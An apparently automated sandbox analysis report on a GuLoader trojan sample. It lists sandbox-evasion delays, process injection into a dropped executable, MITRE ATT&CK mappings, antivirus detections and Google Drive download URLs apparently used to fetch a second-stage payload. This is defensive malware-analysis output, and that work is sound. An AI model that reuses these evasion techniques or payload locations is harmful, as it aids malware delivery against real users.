      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeAPI/Special instruction interceptor: Address: 1B65113
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6150Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3502Jump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exe TID: 3816Thread sleep count: 34 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exe TID: 3816Thread sleep time: -340000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
      Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2516453019.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2516453019.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2516453019.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: Autocueing.exe, 00000008.00000003.2660749817.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646551568.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635296609.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029327539.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Autocueing.exe, 00000008.00000003.2660749817.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646551568.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635296609.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029327539.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000344D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
      Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeAPI call chain: ExitProcess graph end nodegraph_0-3285
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeAPI call chain: ExitProcess graph end nodegraph_0-3437
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Autocueing.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Autocueing.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Autocueing.exe base address: 400000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Autocueing.exe base: 1660000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Autocueing.exe "C:\Users\user\AppData\Local\Temp\Autocueing.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Users\user\Desktop\av8XPPpdBc.exe Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
      Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 411 Process Injection | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 411 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Source | Detection | Scanner | Label | Link
      av8XPPpdBc.exe | 49% | Virustotal | | Browse
      av8XPPpdBc.exe | 62% | ReversingLabs | Win32.Trojan.GuLoader |

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\Autocueing.exe | 62% | ReversingLabs | Win32.Trojan.GuLoader |
      C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll | 0% | ReversingLabs | |

      No Antivirus matches
      No Antivirus matches

      Source | Detection | Scanner | Label | Link
      https://drive.userco | 0% | Avira URL Cloud | safe |
      https://drive.google.com%Ur | 0% | Avira URL Cloud | safe |
      https://drive.usercontent.go | 0% | Avira URL Cloud | safe |
      https://www.google-analytics. | 0% | Avira URL Cloud | safe |
      https://ssl.g | 0% | Avira URL Cloud | safe |

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 142.250.185.142 | true | false | | high
      drive.usercontent.google.com | 142.250.185.129 | true | false | | high

      Name | Source | Malicious | Antivirus Detection | Reputation
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://drive.google.com/bAutocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzOeAutocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAutocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.google-analytics.Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://translate.google.com/translate_a/element.jsAutocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://drive.google.com/7Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://drive.usercontent.goAutocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, 
Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://drive.usercontent.google.com/1jcTSjYxsyVm7jljsm6mguYH2OPW7zI44BbsZwkRdo05na2bmIgphK8NDAAutocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&eAutocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357341329.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3346141316.000000000349E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://drive.google.com/V9Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://drive.usercontent.google.com/dAutocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://drive.google.com/1005E9DC5D8267227684D07A38Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2671904849.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://contoso.com/Iconpowershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://drive.google.com/0Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://drive.google.com/trolno-cacheAutocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
